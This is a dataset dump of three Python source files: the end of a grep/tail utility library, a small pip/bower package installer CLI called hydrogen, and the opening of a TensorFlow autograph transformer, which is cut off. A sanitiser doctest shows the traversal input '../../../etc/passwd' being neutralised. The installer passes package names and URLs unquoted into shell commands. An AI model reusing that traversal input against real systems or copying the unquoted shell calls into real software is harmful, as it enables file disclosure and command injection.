class TailWorkerUBIH(TailWorkerULIH):
"""Unseekable, byte mode ignore head"""
def read(self):
return self.ifile.read(self.bs)
def transform(self, data):
return len(data)
def split_and_proc(self, data, diff):
self.ofile.write(data[-diff:])
class TailWorkerTLIH(TailWorkerULIH):
"""Terminal, line mode ignore head"""
def read(self):
return self.ifile.readline()
class TailWorkerTBIH(TailWorkerTLIH):
"""Terminal, byte mode ignore head"""
def transform(self, data):
return len(data)
def split_and_proc(self, data, diff):
self.ofile.write(data[-diff:])
class TailWorkerTL(TailWorkerSLIH):
"""Terminal, line mode, ignore head"""
def read(self):
return self.ifile.readline()
def handle_last(self, data):
self.copy_to_end()
class TailWorkerTB(TailWorkerTL):
"""Terminal, byte mode, ignore head"""
def transform(self, data):
return len(data)
def handle_last(self, data):
self.ofile.write(data[self.amount:])
self.copy_to_end()
class GrepNameDetermined(Exception): pass
class GrepStatusDetermined(Exception): pass
class GrepWorker:
# VT100 color code
c_fname = b'\x1b[35m' # magenta
c_sep = b'\x1b[36m' # cyan
c_lnum = b'\x1b[32m' # green
c_match = b'\x1b[31m\x1b[1m' # bold red
c_off = b'\x1b[0m' # turn off color
sep_line = b'--\n'
c_sep_line = c_sep + b'--' + c_off + b'\n'
def __init__(self, pattern, options, ifile, ofile, bs=None):
self.pattern = pattern
self.options = options
self.ifile = ifile
self.ofile = ofile
self.bs = bs or 8192
self.nr = 0 # number of records
self.fname = self.make_fname(ifile.name)
self.status = False
# Invert the sense of matching
if ('invert' in options and 'file_match' not in options
and 'count' not in options):
self.on_match, self.on_not_match = self.on_not_match, self.on_match
# set on_match method for -q option
if 'quiet' in options:
self.on_match = self.quiet_on_match
# set reader for tty input file
if ifile.isatty():
self.read = self.read_tty
self.write = self.write_tty
# setup color output
color = options['color']
if color == 'always' or self.ofile.isatty() and color == 'auto':
self.sep_line = self.c_sep_line
self.make_fname_str = self.make_color_fname_str
self.make_lnum_str = self.make_color_lnum_str
self.make_matcher = self.make_color_matcher
self.matcher = self.make_matcher(options)
def insert_line_number(self, lines, num, sep=b':'):
"""Insert line number to the head of each line"""
num = str(num).encode()
num_str = self.make_lnum_str(num, sep)
return (b'%s%s' % (num_str, line) for line in lines)
def insert_file_name(self, lines, fname, sep=b':'):
"""Insert file name to the head of each line"""
fname_str = self.make_fname_str(fname, sep)
return (b'%s%s' % (fname_str, line) for line in lines)
def make_lnum_str(self, num, sep):
return num + sep
def make_fname_str(self, fname, sep):
return fname + sep
def make_color_lnum_str(self, num, sep):
return self.c_lnum + num + self.c_sep + sep + self.c_off
def make_color_fname_str(self, fname, sep):
return self.c_fname + fname + self.c_sep + sep + self.c_off
def quiet_on_match(self, *args, **kargs):
raise GrepStatusDetermined
def read(self):
"""Return an enumerate object with line number"""
lines = self.ifile.readlines(self.bs)
if not lines:
return None
count = len(lines)
res = enumerate(lines, self.nr + 1)
self.nr += count
return res
def read_tty(self):
"""Read the terminal, line by line"""
line = self.ifile.readline()
if not line:
return None
self.nr += 1
return [(self.nr, line)]
def make_normal_matcher(self, options):
# handle -w option, match word boundary
pat = self.pattern
if 'word_regexp' in self.options:
pat = r'\b%s\b' % pat
# handle -i option, ignore case
flags = 0
if 'ignore_case' in self.options:
flags |= re.IGNORECASE
pat = re.compile(pat.encode(), flags)
return pat
def make_matcher(self, options):
pat = self.make_normal_matcher(options)
class C:
def findall(self, line):
return pat.findall(line), line
return C()
def make_color_matcher(self, options):
pat = self.make_normal_matcher(options)
c_match = self.c_match
c_off = self.c_off
class C:
def findall(self, line):
matches = pat.findall(line)
if matches:
matches = [c_match + x + c_off for x in matches]
line = re.sub(pat, self.apply_color, line)
return matches, line
def apply_color(self, m):
return c_match + m.group() + c_off
return C()
def make_fname(self, name):
"""Make a file name for output"""
if name == 0:
name = '(standard input)'.encode()
else:
name = str(name).encode()
return name
def format_output(self, lines, lnum, options, sep=b':'):
"""Format lines for output"""
# handle -n option, show line number
if 'line_number' in options:
lines = self.insert_line_number(lines, lnum, sep)
# insert file name if necessary
if options['with_filename']:
lines = self.insert_file_name(lines, self.fname, sep)
return lines
def write(self, lines):
self.ofile.writelines(lines)
def write_tty(self, lines):
"""Write to terminal, flush after every write"""
self.ofile.writelines(lines)
self.ofile.flush()
def on_match(self, matches, line, lnum):
self.status = True
# handle -o option, show only the matched part
if 'only_matching' in self.options:
lines = (x + b'\n' for x in matches)
else:
lines = [line]
lines = self.format_output(lines, lnum, self.options)
self.write(lines)
def on_not_match(self, *args, **kargs):
return None
def run(self):
while True:
lines_data = self.read()
if not lines_data:
break
for n, line in lines_data:
matches, line = self.matcher.findall(line)
if matches:
self.on_match(matches, line, n)
else:
self.on_not_match(matches, line, n)
return self.status
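# Illustrative sketch: running GrepWorker over a single file, roughly what
# `grep -n PATTERN FILE` does. The options dict only sets the keys this class
# actually consults ('color' and 'with_filename' are required); the helper
# name is an assumption for demonstration only.
def _grep_one_file(pattern, path):
    options = {'line_number': True, 'with_filename': False, 'color': 'never'}
    with open(path, 'rb') as f:
        return GrepWorker(pattern, options, f, sys.stdout.buffer).run()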
class GrepWorkerAgg(GrepWorker):
def __init__(self, *args, **kargs):
super(GrepWorkerAgg, self).__init__(*args, **kargs)
self.match_count = 0
def format_output(self, lines, options):
"""Format lines for output"""
# insert file name if necessary
if options['with_filename']:
lines = self.insert_file_name(lines, self.fname)
return lines
def on_match(self, matches, line, lnum):
self.status = True
self.match_count += 1
def run(self):
status = super(GrepWorkerAgg, self).run()
lines = [str(self.match_count).encode() + b'\n']
lines = self.format_output(lines, self.options)
self.write(lines)
return status
class GrepWorkerFileName(GrepWorker):
def on_match(self, matches, line, lnum):
raise GrepNameDetermined
def run(self):
try:
super(GrepWorkerFileName, self).run()
status = False
except GrepNameDetermined:
self.write([self.fname + b'\n'])
status = True
return status
class GrepWorkerContext(GrepWorker):
def __init__(self, *args, **kargs):
super(GrepWorkerContext, self).__init__(*args, **kargs)
self.before = self.options.get('before', 0)
self.after = self.options.get('after', 0)
self.b_buf = []
self.a_counter = 0
self.last_written_lnum = 0
def write_separator(self, lnum):
last_lnum = self.last_written_lnum
first_lnum = self.b_buf[0][0] if self.b_buf else lnum
if last_lnum and first_lnum - last_lnum > 1:
self.write([self.sep_line])
def on_match(self, matches, line, lnum):
# the 'before' buffer may contain more lines than needed,
# truncate it before writing the separator in order not
        # to interfere with the line number calculation.
if self.before:
self.b_buf = self.b_buf[-self.before:]
else:
self.b_buf.clear()
self.write_separator(lnum)
self.write_b_buffer()
super(GrepWorkerContext, self).on_match(matches, line, lnum)
self.last_written_lnum = lnum
self.reset_a_counter()
def on_not_match(self, matches, line, lnum):
if self.a_counter:
if 'only_matching' not in self.options:
lines = self.format_output([line], lnum, self.options, b'-')
self.write(lines)
self.last_written_lnum = lnum
self.a_counter -= 1
else:
self.b_buf.append((lnum, line))
def reset_a_counter(self):
self.a_counter = self.after
def write_b_buffer(self):
"""Write out the 'before' buffer"""
if not self.b_buf:
return
        # write only when the -o option is not present
if 'only_matching' not in self.options:
for lnum, line in self.b_buf:
lines = self.format_output([line], lnum, self.options, b'-')
self.write(lines)
self.last_written_lnum = self.b_buf[-1][0]
self.b_buf.clear()
def run(self):
bs = self.before
while True:
self.b_buf = self.b_buf[-bs:]
lines_data = self.read()
if not lines_data:
break
for n, line in lines_data:
matches, line = self.matcher.findall(line)
if matches:
self.on_match(matches, line, n)
else:
self.on_not_match(matches, line, n)
return self.status
def recursive_walk(worker, names, pattern, options):
"""Process all regular files, descend into directories. When
the -q option is provided, the first match will trigger an
exception named GrepStatusDetermined."""
def processor(names, pattern, options, worker):
status_list = []
for name in names:
if os.path.isfile(name):
status = worker(name, pattern, options)
status_list.append(status)
elif os.path.isdir(name):
try:
sub_names = os.listdir(name)
except Exception as e:
print(str(e), file=sys.stderr)
status_list.append(False)
else:
sub_names = [os.path.join(name, x) for x in sub_names]
names.extend(sub_names)
return status_list
return walk(worker, names, pattern, options, processor)
def walk(worker, names, pattern, options, processor=None):
"""Each file shall be a regular file. When the -q option is
provided, the first match will trigger an exception named
GrepStatusDetermined."""
if not processor:
def processor(names, pattern, options, worker):
status_list = []
for name in names:
status = worker(name, pattern, options)
status_list.append(status)
return status_list
try:
status_list = processor(names, pattern, options, worker)
except GrepStatusDetermined:
status_list = [True]
if 'quiet' in options:
return any(status_list)
else:
return all(status_list)
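# Illustrative sketch: driving recursive_walk with a per-file worker, roughly
# `grep -rn PATTERN PATH...`. The worker signature (name, pattern, options)
# matches what the processors above expect; the helper name and options are
# assumptions for demonstration only.
def _grep_tree(pattern, paths):
    options = {'line_number': True, 'with_filename': True, 'color': 'never'}
    def worker(name, pattern, options):
        with open_file(name) as f:
            return GrepWorker(pattern, options, f, sys.stdout.buffer).run()
    return recursive_walk(worker, list(paths), pattern, options)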
| iesugrace/pycmd | lib.py | Python | gpl-3.0 | 24,434 | 0.000941 |
# -*- coding: utf-8 -*-
"""
hydrogen
~~~~~~~~
Hydrogen is an extremely lightweight workflow enhancement tool for Python
web applications, providing bower/npm-like functionality for both pip and
bower packages.
:author: David Gidwani <david.gidwani@gmail.com>
:license: BSD, see LICENSE for details
"""
import atexit
from collections import defaultdict
from functools import update_wrapper
import json
import os
import re
import shutil
import sys
import tempfile
import yaml
import zipfile
import click
import envoy
from pathlib import Path, PurePath
from pathspec import GitIgnorePattern, PathSpec
from pip._vendor import pkg_resources
import requests
import rfc6266
import semver
__version__ = "0.0.1-alpha"
prog_name = "hydrogen"
app_dir = click.get_app_dir(prog_name)
github_api_uri = "https://api.github.com"
debug = True
# borrowed from werkzeug._compat
PY2 = sys.version_info[0] == 2
if PY2:
from urlparse import urlparse
text_type = unicode # noqa: Undefined in py3
else:
from urllib.parse import urlparse
text_type = str
class InvalidRequirementSpecError(Exception):
pass
class InvalidPackageError(Exception):
pass
class PackageNotFoundError(Exception):
pass
class VersionNotFoundError(Exception):
pass
def get_installed_pypackages():
return {p.project_name.lower(): p for p in pkg_resources.working_set}
def success(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "green")
click.secho(message, **kwargs)
def warning(message, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"warning: {}".format(message), **kwargs)
def error(message, level="error", exit_code=1, **kwargs):
kwargs["fg"] = kwargs.get("fg", "red")
click.secho(u"error: {}".format(message), **kwargs)
sys.exit(exit_code)
def fatal(message, **kwargs):
error(message, level="fatal", **kwargs)
def secure_filename(filename):
r"""Borrowed from :mod:`werkzeug.utils`, under the BSD 3-clause license.
Pass it a filename and it will return a secure version of it. This
filename can then safely be stored on a regular file system and passed
to :func:`os.path.join`. The filename returned is an ASCII only string
for maximum portability.
On windows systems the function also makes sure that the file is not
named after one of the special device files.
>>> secure_filename("My cool movie.mov")
'My_cool_movie.mov'
>>> secure_filename("../../../etc/passwd")
'etc_passwd'
>>> secure_filename(u'i contain cool \xfcml\xe4uts.txt')
'i_contain_cool_umlauts.txt'
The function might return an empty filename. It's your responsibility
    to ensure that the filename is unique and that you generate a random
    filename if the function returned an empty one.
:param filename: the filename to secure
"""
_filename_ascii_strip_re = re.compile(r'[^A-Za-z0-9_.-]')
_windows_device_files = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4',
'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
if isinstance(filename, text_type):
from unicodedata import normalize
filename = normalize('NFKD', filename).encode('ascii', 'ignore')
if not PY2:
filename = filename.decode('ascii')
for sep in os.path.sep, os.path.altsep:
if sep:
filename = filename.replace(sep, ' ')
filename = str(_filename_ascii_strip_re.sub('', '_'.join(
filename.split()))).strip('._')
# on nt a couple of special files are present in each folder. We
# have to ensure that the target file is not such a filename. In
# this case we prepend an underline
if os.name == 'nt' and filename and \
filename.split('.')[0].upper() in _windows_device_files:
filename = '_' + filename
return filename
def get(url, session=None, silent=not debug, **kwargs):
"""Retrieve a given URL and log response.
:param session: a :class:`requests.Session` object.
:param silent: if **True**, response status and URL will not be printed.
"""
session = session or requests
kwargs["verify"] = kwargs.get("verify", True)
r = session.get(url, **kwargs)
if not silent:
status_code = click.style(
str(r.status_code),
fg="green" if r.status_code in (200, 304) else "red")
click.echo(status_code + " " + url)
if r.status_code == 404:
raise PackageNotFoundError
return r
def download_file(url, dest=None, chunk_size=1024, replace="ask",
label="Downloading {dest_basename} ({size:.2f}MB)",
expected_extension=None):
"""Download a file from a given URL and display progress.
:param dest: If the destination exists and is a directory, the filename
will be guessed from the Content-Disposition header. If the destination
is an existing file, the user will either be prompted to overwrite, or
the file will be replaced (depending on the value of **replace**). If
the destination does not exist, it will be used as the filename.
:param int chunk_size: bytes read in at a time.
:param replace: If `False`, an existing destination file will not be
overwritten.
:param label: a string which is formatted and displayed as the progress bar
label. Variables provided include *dest_basename*, *dest*, and *size*.
:param expected_extension: if set, the filename will be sanitized to ensure
it has the given extension. The extension should not start with a dot
(`.`).
"""
dest = Path(dest or url.split("/")[-1])
response = get(url, stream=True)
if (dest.exists()
and dest.is_dir()
and "Content-Disposition" in response.headers):
content_disposition = rfc6266.parse_requests_response(response)
if expected_extension is not None:
filename = content_disposition.filename_sanitized(
expected_extension)
filename = secure_filename(filename)
dest = dest / filename
if dest.exists() and not dest.is_dir():
if (replace is False
or replace == "ask"
and not click.confirm("Replace {}?".format(dest))):
return str(dest)
size = int(response.headers.get("content-length", 0))
label = label.format(dest=dest, dest_basename=dest.name,
size=size/1024.0/1024)
with click.open_file(str(dest), "wb") as f:
content_iter = response.iter_content(chunk_size=chunk_size)
with click.progressbar(content_iter, length=size/1024,
label=label) as bar:
for chunk in bar:
if chunk:
f.write(chunk)
f.flush()
return str(dest)
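# --- Illustrative usage sketch (added; not part of the original module) ---
# download_file() streams a URL to disk with a click progress bar. The URL
# below is a placeholder, and the example assumes the server sends a
# Content-Disposition header so a filename can be derived when `dest` is a
# directory.
def _demo_download_file():
    temp_dir = mkdtemp()  # defined further down in this module; looked up at call time
    return download_file(
        "https://example.com/archive.zip",  # hypothetical URL
        dest=temp_dir,
        replace=True,  # overwrite an existing file without prompting
        expected_extension="zip")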
def get_dir_from_zipfile(zip_file, fallback=None):
"""Return the name of the root folder in a zip file.
:param zip_file: a :class:`zipfile.ZipFile` instance.
:param fallback: if `None`, the name of the zip file is used. This is
returned if the zip file contains more than one top-level directory,
or none at all.
"""
fallback = fallback or zip_file.filename
directories = [name for name in zip_file.namelist() if name.endswith("/")
and len(PurePath(name).parts) == 1]
    return fallback if len(directories) != 1 else directories[0]
def mkdtemp(suffix="", prefix=__name__ + "_", dir=None, cleanup=True,
on_cleanup_error=None):
"""Create a temporary directory and register a handler to cleanup on exit.
:param suffix: suffix of the temporary directory, defaults to empty.
:param prefix: prefix of the temporary directory, defaults to `__name__`
and an underscore.
:param dir: if provided, the directory will be created in `dir` rather than
the system default temp directory.
:param cleanup: if `True`, an atexit handler will be registered to remove
the temp directory on exit.
:param on_cleanup_error: a callback which is called if the atexit handler
encounters an exception. It is passed three parameters: *function*,
*path*, and *excinfo*. For more information, see the :mod:`atexit`
documentation.
"""
path = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)
if cleanup:
if on_cleanup_error is None:
def on_cleanup_error(function, path, excinfo):
click.secho("warning: failed to remove file or directory: {}\n"
"please delete it manually.".format(path),
fg="red")
atexit.register(shutil.rmtree, path=path, onerror=on_cleanup_error)
return path
class Requirement(object):
"""Represents a single package requirement.
.. note::
This class overrides `__hash__` in order to ensure that package
names remain unique when in a set.
.. todo::
Extend :class:`pkg_resources.Requirement` for Python requirements.
"""
# TODO: support multiple version specs (e.g. >=1.0,<=2.0)
spec_regex = r"(.+?)\s*(?:([<>~=]?=)\s*(.+?))?$"
def __init__(self, package, version):
"""Construct a new requirement.
:param package: the package name.
:param version: a semver compatible version specification.
"""
self.package = package
self.version = version
if self.version and not re.match(r"[<=>~]", version[:2]):
self.version = "=={}".format(self.version)
@classmethod
def coerce(cls, string):
"""Create a :class:`Requirement` object from a given package spec."""
match = re.match(cls.spec_regex, string)
if not match:
raise InvalidRequirementSpecError("could not parse requirement")
package = match.group(1)
if all(match.group(2, 3)):
version = "".join(match.group(2, 3))
else:
version = None
return cls(package, version)
def load_installed_version(self):
installed_packages = get_installed_pypackages()
if self.package in installed_packages:
self.version = "=={}".format(
installed_packages[self.package].version)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
other.package == self.package)
def __hash__(self):
return hash(self.package)
def __str__(self):
return "".join([self.package, self.version or ""])
def __repr__(self):
return "<Requirement(package={package}, version='{version}')>".format(
package=self.package, version=self.version)
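# --- Illustrative sketch (added; not part of the original module) ---
# Requirement.coerce() splits a pip-style spec into a name and a version; a
# bare version such as "0.10" is normalized to "==0.10" by the constructor.
def _demo_requirement_coerce():
    assert str(Requirement.coerce("flask>=0.10")) == "flask>=0.10"
    assert str(Requirement("flask", "0.10")) == "flask==0.10"
    assert Requirement.coerce("requests").version is None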
class Requirements(set):
"""Represents a set of requirements."""
def __init__(self, filename=None):
self.filename = None
if filename:
self.load(filename)
def add(self, elem, replace=False):
"""Add a requirement.
:param elem: a string or :class:`Requirement` instance.
:param replace: if `True`, packages in the set with the same name will
be removed first.
"""
if isinstance(elem, text_type):
elem = Requirement.coerce(elem)
if replace and elem in self:
self.remove(elem)
super(Requirements, self).add(elem)
def load(self, requirements_file=None):
"""Load or reload requirements from a requirements.txt file.
:param requirements_file: if not given, the filename used from
initialization will be read again.
"""
if requirements_file is None:
requirements_file = self.filename
if requirements_file is None:
raise ValueError("no filename provided")
elif isinstance(requirements_file, text_type):
requirements_file = Path(requirements_file)
self.clear()
with requirements_file.open() as f:
self.loads(f.read())
if isinstance(requirements_file, (text_type, Path)):
self.filename = requirements_file
def loads(self, requirements_text):
lines = re.findall(Requirement.spec_regex,
requirements_text,
re.MULTILINE)
for line in lines:
self.add(Requirement(line[0], "".join(line[1:])))
def remove(self, elem):
"""Remove a requirement.
:param elem: a string or :class:`Requirement` instance.
"""
if isinstance(elem, text_type):
for requirement in self:
if requirement.package == elem:
return super(Requirements, self).remove(requirement)
return super(Requirements, self).remove(elem)
def __str__(self):
return "\n".join([str(x) for x in self])
    def __repr__(self):
        return "<Requirements({})>".format(
            self.filename.name if self.filename else "")
class NamedRequirements(Requirements):
def __init__(self, name, filename=None):
self.name = name
super(NamedRequirements, self).__init__(filename=filename)
def __repr__(self):
return "<NamedRequirements({}{})>".format(
self.name,
", filename='{}'".format(self.filename.name) if self.filename
else "")
class GroupedRequirements(defaultdict):
default_groups = ["all", "dev", "bower", "bower-dev"]
default_pip_files = {
"all": "requirements.txt",
"dev": "dev-requirements.txt"
}
def __init__(self, groups=None):
super(GroupedRequirements, self).__init__(NamedRequirements)
self.groups = groups or self.default_groups
self.filename = None
self.create_default_groups()
def clear(self):
super(GroupedRequirements, self).clear()
self.create_default_groups()
def create_default_groups(self):
for group in self.groups:
group = group.replace(" ", "_").lower()
self[group] = NamedRequirements(group)
def load_pip_requirements(self, files_map=None, freeze=True):
if files_map is None:
files_map = self.default_pip_files
for group, requirements_txt in files_map.items():
path = Path(requirements_txt)
if not path.exists() and group.lower() == "all" and freeze:
cmd = envoy.run("pip freeze")
self[group].loads(cmd.std_out)
elif path.exists():
self[group].load(path)
def load(self, filename, create_if_missing=True):
filename = Path(filename)
if not filename.exists() and create_if_missing:
self.load_pip_requirements()
with filename.open("w") as f:
f.write(yaml.dump(self.serialized, default_flow_style=False,
encoding=None))
self.filename = filename
return self.save(filename)
with filename.open() as f:
for group, requirements in yaml.load(f.read()).items():
for requirement in requirements:
self[group].add(Requirement.coerce(requirement))
self.filename = filename
def save(self, filename=None):
filename = Path(filename) if filename is not None else self.filename
with filename.open("w") as f:
f.write(self.yaml)
@property
def serialized(self):
to_ret = {}
for group, requirements in self.items():
to_ret[group] = [str(requirement) for requirement in requirements]
return to_ret
@property
def yaml(self):
return yaml.dump(self.serialized, default_flow_style=False,
encoding=None)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
else:
ret = self[key] = self.default_factory(name=key)
return ret
class Bower(object):
bower_base_uri = "https://bower.herokuapp.com"
@classmethod
def get_package_url(cls, package, session=None, silent=False):
response = get("{}/packages/{}".format(cls.bower_base_uri, package))
return response.json().get("url", None)
@classmethod
def clean_semver(cls, version_spec):
return re.sub(r"([<>=~])\s+?v?", "\\1", version_spec, re.IGNORECASE)
class Hydrogen(object):
def __init__(self, assets_dir=None, requirements_file="requirements.yml"):
self.assets_dir = assets_dir or Path(".") / "assets"
self.requirements = GroupedRequirements()
self.requirements.load(requirements_file)
self.temp_dir = mkdtemp()
def extract_bower_zipfile(self, zip_file, dest, expected_version=None):
bower_json = None
root = None
deps_installed = []
for info in zip_file.infolist():
if PurePath(info.filename).name == "bower.json":
with zip_file.open(info) as f:
bower_json = json.load(f)
root = str(PurePath(info.filename).parent)
break
version = bower_json["version"]
if expected_version is not None:
expected_version = Bower.clean_semver(expected_version)
if not semver.match(version, expected_version):
click.secho("error: versions do not match ({} =/= {})".format(
version, expected_version))
raise InvalidPackageError
if "dependencies" in bower_json:
for package, version in bower_json["dependencies"].items():
url = Bower.get_package_url(package)
deps_installed.extend(self.get_bower_package(
url, dest=dest, version=version))
        ignore_patterns = [GitIgnorePattern(ig) for ig in bower_json.get("ignore", [])]
path_spec = PathSpec(ignore_patterns)
namelist = [path for path in zip_file.namelist()
if PurePath(path).parts[0] == root]
ignored = list(path_spec.match_files(namelist))
for path in namelist:
dest_path = PurePath(
bower_json["name"],
*PurePath(path).parts[1:])
if path in ignored:
continue
            # NOTE: this block looks like an unfinished attempt at skipping the
            # children of ignored directories; the loop variables are renamed so
            # they no longer clobber `path`, but the block remains a no-op.
            for ignored_path in ignored:
                for parent in PurePath(ignored_path).parents:
                    if parent in ignored:
                        continue
if path.endswith("/"):
if list(path_spec.match_files([str(dest_path)])):
ignored.append(PurePath(path))
elif not (dest / dest_path).is_dir():
(dest / dest_path).mkdir(parents=True)
else:
target_path = dest / dest_path.parent / dest_path.name
source = zip_file.open(path)
target = target_path.open("wb")
with source, target:
shutil.copyfileobj(source, target)
deps_installed.append((bower_json["name"], bower_json["version"]))
return deps_installed
def get_bower_package(self, url, dest=None, version=None,
process_deps=True):
dest = dest or Path(".") / "assets"
parsed_url = urlparse(url)
if parsed_url.scheme == "git" or parsed_url.path.endswith(".git"):
if parsed_url.netloc == "github.com":
user, repo = parsed_url.path[1:-4].split("/")
response = get(github_api_uri +
"/repos/{}/{}/tags".format(user, repo))
tags = response.json()
target = None
if not len(tags):
click.secho("fatal: no tags exist for {}/{}".format(
user, repo), fg="red")
raise InvalidPackageError
if version is None:
target = tags[0]
else:
for tag in tags:
if semver.match(tag["name"],
Bower.clean_semver(version)):
target = tag
break
if not target:
click.secho(
"fatal: failed to find matching tag for "
"{user}/{repo} {version}".format(user, repo, version),
fg="red")
raise VersionNotFoundError
click.secho("installing {}/{}#{}".format(
user, repo, tags[0]["name"]), fg="green")
return self.get_bower_package(
url=target["zipball_url"],
dest=dest,
version=version)
raise NotImplementedError
click.echo("git clone {url}".format(url=url))
cmd = envoy.run('git clone {url} "{dest}"'.format(
url=url, dest=dest))
elif parsed_url.scheme in ("http", "https"):
zip_dest = download_file(url, dest=self.temp_dir,
label="{dest_basename}",
expected_extension="zip")
with zipfile.ZipFile(zip_dest, "r") as pkg:
return self.extract_bower_zipfile(pkg, dest,
expected_version=version)
# pkg.extractall(str(dest))
else:
click.secho("protocol currently unsupported :(")
sys.exit(1)
def install_bower(self, package, save=True, save_dev=False):
"""Installs a bower package.
:param save: if `True`, pins the package to the Hydrogen requirements
YAML file.
:param save_dev: if `True`, pins the package as a development
dependency to the Hydrogen requirements YAML file.
        :returns: a list of :class:`Requirement` objects for every installed
            package, including any dependencies.
"""
requirement = Requirement.coerce(package)
url = Bower.get_package_url(requirement.package)
installed = []
for name, _ in self.get_bower_package(url):
installed.append(Requirement(name, requirement.version))
for requirement in installed:
if save:
self.requirements["bower"].add(requirement, replace=True)
if save_dev:
self.requirements["bower-dev"].add(requirement, replace=True)
success("installed {}".format(str(requirement)))
if save or save_dev:
self.requirements.save()
return installed
def install_pip(self, package, save=True, save_dev=False):
"""Installs a pip package.
:param save: if `True`, pins the package to the Hydrogen requirements
YAML file.
:param save_dev: if `True`, pins the package as a development
dependency to the Hydrogen requirements YAML file.
        :returns: a **single** :class:`Requirement` object, representing
            the installed version of the given package.
"""
requirement = Requirement.coerce(package)
click.echo("pip install " + requirement.package)
cmd = envoy.run("pip install {}".format(str(requirement)))
if cmd.status_code == 0:
installed_packages = get_installed_pypackages()
package = installed_packages[requirement.package]
requirement.version = "=={}".format(package.version)
if save:
self.requirements["all"].add(requirement)
if save_dev:
self.requirements["dev"].add(requirement)
if save or save_dev:
self.requirements.save()
return requirement
else:
fatal(cmd.std_err)
def groups_option(f):
new_func = click.option("-g", "--groups",
help="Comma-separated list of requirement groups "
"to include.")(f)
return update_wrapper(new_func, f)
@click.group()
@click.version_option(prog_name=prog_name)
@click.pass_context
def main(ctx):
which = "where" if sys.platform == "win32" else "which"
if envoy.run(which + " git").status_code != 0:
click.secho("fatal: git not found in PATH", fg="red")
sys.exit(1)
ctx.obj = Hydrogen()
@main.command()
@click.pass_obj
@click.option("output_yaml", "--yaml", "-y", is_flag=True,
help="Show requirements in YAML format.")
@click.option("--resolve", "-r", is_flag=True,
help="Resolve version numbers for ambiguous packages.")
@groups_option
def freeze(h, output_yaml, resolve, groups):
"""Output installed packages."""
if not groups:
groups = filter(lambda group: not group.lower().startswith("bower"),
h.requirements.keys())
else:
groups = [text_type.strip(group) for group in groups.split(",")]
if output_yaml:
for requirements in h.requirements.values():
for requirement in requirements:
if resolve and not requirement.version:
requirement.load_installed_version()
click.echo(h.requirements.yaml)
else:
for group in groups:
if not h.requirements[group]:
continue
click.echo("# {}".format(group))
for requirement in h.requirements[group]:
if resolve and not requirement.version:
requirement.load_installed_version()
click.echo(str(requirement))
@main.command()
@click.pass_obj
@click.option("--pip/--bower", default=True)
@groups_option
@click.option("--save", is_flag=True)
@click.option("--save-dev", is_flag=True)
@click.argument("packages", nargs=-1)
def install(h, pip, groups, save, save_dev, packages):
"""Install a pip or bower package."""
if groups:
groups = [text_type.strip(group) for group in groups.split(",")]
else:
groups = h.requirements.keys()
if not packages:
for group in groups:
if group not in h.requirements:
warning("{} not in requirements".format(group))
continue
install = (h.install_bower if group.startswith("bower")
else h.install_pip)
for requirement in h.requirements[group]:
install(str(requirement), save=False, save_dev=False)
if pip:
for package in packages:
h.install_pip(package, save=save, save_dev=save_dev)
else:
for package in packages:
h.install_bower(package, save=save, save_dev=save_dev)
if __name__ == "__main__":
main()
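# --- Illustrative CLI sketch (added; not part of the original module) ---
# Assuming the console script is installed under the name `hydrogen` (the
# prog_name above), the click commands defined in this module translate into
# invocations such as the following (package names are placeholders):
#
#   hydrogen freeze --yaml --resolve
#   hydrogen install --save flask click
#   hydrogen install --bower --save-dev jquery
#   hydrogen install -g dev,bower   # no packages given: reinstall the pinned groups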
|
darvid/hydrogen
|
hydrogen.py
|
Python
|
bsd-2-clause
| 26,677
| 0
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds guards against function calls with side effects.
Only standalone calls are guarded.
WARNING: This mechanism is incomplete. Particularly, it only guards the
arguments passed to functions, and does not account for indirectly modified
state.
Example:
y = tf.layers.dense(x) # Creates TF variable 'foo'
loss = loss(y)
opt.minimize(loss) # indirectly affects 'foo'
z = tf.get_variable('foo') # Indirectly affects `loss` and 'foo'
# Here, `loss` can be guarded. But `z` cannot.
# TODO(mdan): We should probably define a safe mode where we guard everything.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct import ast_util
from tensorflow.contrib.autograph.pyct import qual_names
from tensorflow.contrib.autograph.pyct import templates
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.static_analysis.annos import NodeAnno
class SymbolNamer(object):
"""Describes the interface for SideEffectGuardTransformer's namer."""
def new_symbol(self, name_root, reserved_locals):
"""Generate a new unique function_name.
Args:
name_root: String, used as stem in the new name.
reserved_locals: Set(string), additional local symbols that are reserved.
Returns:
String.
"""
raise NotImplementedError()
class SideEffectGuardTransformer(transformer.Base):
"""Adds control dependencies to functions with side effects."""
def __init__(self, context):
super(SideEffectGuardTransformer, self).__init__(context)
# pylint:disable=invalid-name
def _visit_and_reindent(self, nodes):
new_nodes = []
current_dest = new_nodes
alias_map = {}
reindent_requested = False
for n in nodes:
n = self.visit(n)
# NOTE: the order in which these statements execute is important; in
# particular, watch out for ending up with cycles in the AST.
if alias_map:
n = ast_util.rename_symbols(n, alias_map)
if isinstance(n, (list, tuple)):
current_dest.extend(n)
else:
current_dest.append(n)
if anno.hasanno(n, anno.Basic.INDENT_BLOCK_REMAINDER):
reindent_requested = True
new_dest, new_alias_map = anno.getanno(
n, anno.Basic.INDENT_BLOCK_REMAINDER)
anno.delanno(n, anno.Basic.INDENT_BLOCK_REMAINDER)
new_alias_map.update(alias_map)
alias_map = new_alias_map
current_dest = new_dest
if reindent_requested and not current_dest:
# TODO(mdan): There may still be something that could be done.
raise ValueError('Unable to insert statement into the computation flow: '
'it is not followed by any computation which '
'the statement could gate.')
return new_nodes
def visit_FunctionDef(self, node):
